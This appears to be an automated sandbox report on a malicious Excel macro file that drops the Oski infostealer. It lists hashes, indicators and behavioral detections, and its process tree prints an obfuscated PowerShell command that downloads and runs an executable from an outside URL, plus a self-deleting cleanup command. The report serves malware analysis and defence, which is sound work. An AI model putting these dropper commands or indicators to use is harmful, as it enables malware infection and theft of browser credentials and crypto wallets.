Analysis
-
max time kernel
108s -
max time network
144s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
04/08/2021, 19:33
Behavioral task
behavioral1
Sample
691394d2a820bef88cb57d83b11ab0ee976deb69c790540a7a13b99c3675371f.xlsm
Resource
win7v20210410
Behavioral task
behavioral2
Sample
691394d2a820bef88cb57d83b11ab0ee976deb69c790540a7a13b99c3675371f.xlsm
Resource
win10v20210408
General
-
Target
691394d2a820bef88cb57d83b11ab0ee976deb69c790540a7a13b99c3675371f.xlsm
-
Size
13KB
-
MD5
2be7123060d0a3294b6fabff5553da30
-
SHA1
a62e852b641ff566c41ef49ffb60b2cff377acdc
-
SHA256
691394d2a820bef88cb57d83b11ab0ee976deb69c790540a7a13b99c3675371f
-
SHA512
d5fdf9eef61e3f498f268285870b38c679b9f692f5ac74b269688a20691da8c660c35dcb05f1ff3b6e3e2c30d4b39dc983ce71dc0d32b168d1b1a998ff750856
Malware Config
Extracted
http://iurl.vip/3osyi
Extracted
oski
notedemo.axfree.com
Signatures
-
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2712 4016 cmd.exe 67 Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3148 4016 powershell.exe 67 -
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
Blocklisted process makes network request 2 IoCs
flow pid Process 21 3148 powershell.exe 24 3148 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 1716 DoFPS.exe -
Loads dropped DLL 3 IoCs
pid Process 1764 vbc.exe 1764 vbc.exe 1764 vbc.exe -
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
pid Process 2712 cmd.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1716 set thread context of 1764 1716 DoFPS.exe 87 -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString vbc.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Kills process with taskkill 1 IoCs
pid Process 4076 taskkill.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4016 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3272 powershell.exe 3148 powershell.exe 3148 powershell.exe 3272 powershell.exe 3148 powershell.exe 3272 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3272 powershell.exe Token: SeDebugPrivilege 3148 powershell.exe Token: SeDebugPrivilege 1716 DoFPS.exe Token: SeDebugPrivilege 4076 taskkill.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 4016 EXCEL.EXE 4016 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 4016 EXCEL.EXE 4016 EXCEL.EXE 4016 EXCEL.EXE 4016 EXCEL.EXE 4016 EXCEL.EXE 4016 EXCEL.EXE 4016 EXCEL.EXE 4016 EXCEL.EXE 4016 EXCEL.EXE 4016 EXCEL.EXE 4016 EXCEL.EXE 4016 EXCEL.EXE 4016 EXCEL.EXE 4016 EXCEL.EXE -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 4016 wrote to memory of 2712 4016 EXCEL.EXE 75 PID 4016 wrote to memory of 2712 4016 EXCEL.EXE 75 PID 4016 wrote to memory of 3148 4016 EXCEL.EXE 77 PID 4016 wrote to memory of 3148 4016 EXCEL.EXE 77 PID 2712 wrote to memory of 3272 2712 cmd.exe 79 PID 2712 wrote to memory of 3272 2712 cmd.exe 79 PID 3272 wrote to memory of 1716 3272 powershell.exe 86 PID 3272 wrote to memory of 1716 3272 powershell.exe 86 PID 3272 wrote to memory of 1716 3272 powershell.exe 86 PID 1716 wrote to memory of 1764 1716 DoFPS.exe 87 PID 1716 wrote to memory of 1764 1716 DoFPS.exe 87 PID 1716 wrote to memory of 1764 1716 DoFPS.exe 87 PID 1716 wrote to memory of 1764 1716 DoFPS.exe 87 PID 1716 wrote to memory of 1764 1716 DoFPS.exe 87 PID 1716 wrote to memory of 1764 1716 DoFPS.exe 87 PID 1716 wrote to memory of 1764 1716 DoFPS.exe 87 PID 1716 wrote to memory of 1764 1716 DoFPS.exe 87 PID 1716 wrote to memory of 1764 1716 DoFPS.exe 87 PID 1764 wrote to memory of 3364 1764 vbc.exe 88 PID 1764 wrote to memory of 3364 1764 vbc.exe 88 PID 1764 wrote to memory of 3364 1764 vbc.exe 88 PID 3364 wrote to memory of 4076 3364 cmd.exe 90 PID 3364 wrote to memory of 4076 3364 cmd.exe 90 PID 3364 wrote to memory of 4076 3364 cmd.exe 90
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\691394d2a820bef88cb57d83b11ab0ee976deb69c790540a7a13b99c3675371f.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Windows\SYSTEM32\cmd.execmd /c p^o^w^e^r^s^h^e^l^l.e^xe -w 1 Start-Sleep 10;%Temp%\DoFPS.exe2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -w 1 Start-Sleep 10;C:\Users\Admin\AppData\Local\Temp\DoFPS.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3272 -
C:\Users\Admin\AppData\Local\Temp\DoFPS.exe"C:\Users\Admin\AppData\Local\Temp\DoFPS.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"5⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 1764 & erase C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe & RD /S /Q C:\\ProgramData\\696946246624170\\* & exit6⤵
- Suspicious use of WriteProcessMemory
PID:3364 -
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 17647⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4076
-
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (nEw-oBjecT Net.WebcLIENt).('Down'+'loadFile').Invoke('http://iurl.vip/3osyi',$env:Temp+'\DoFPS.exe')2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3148
-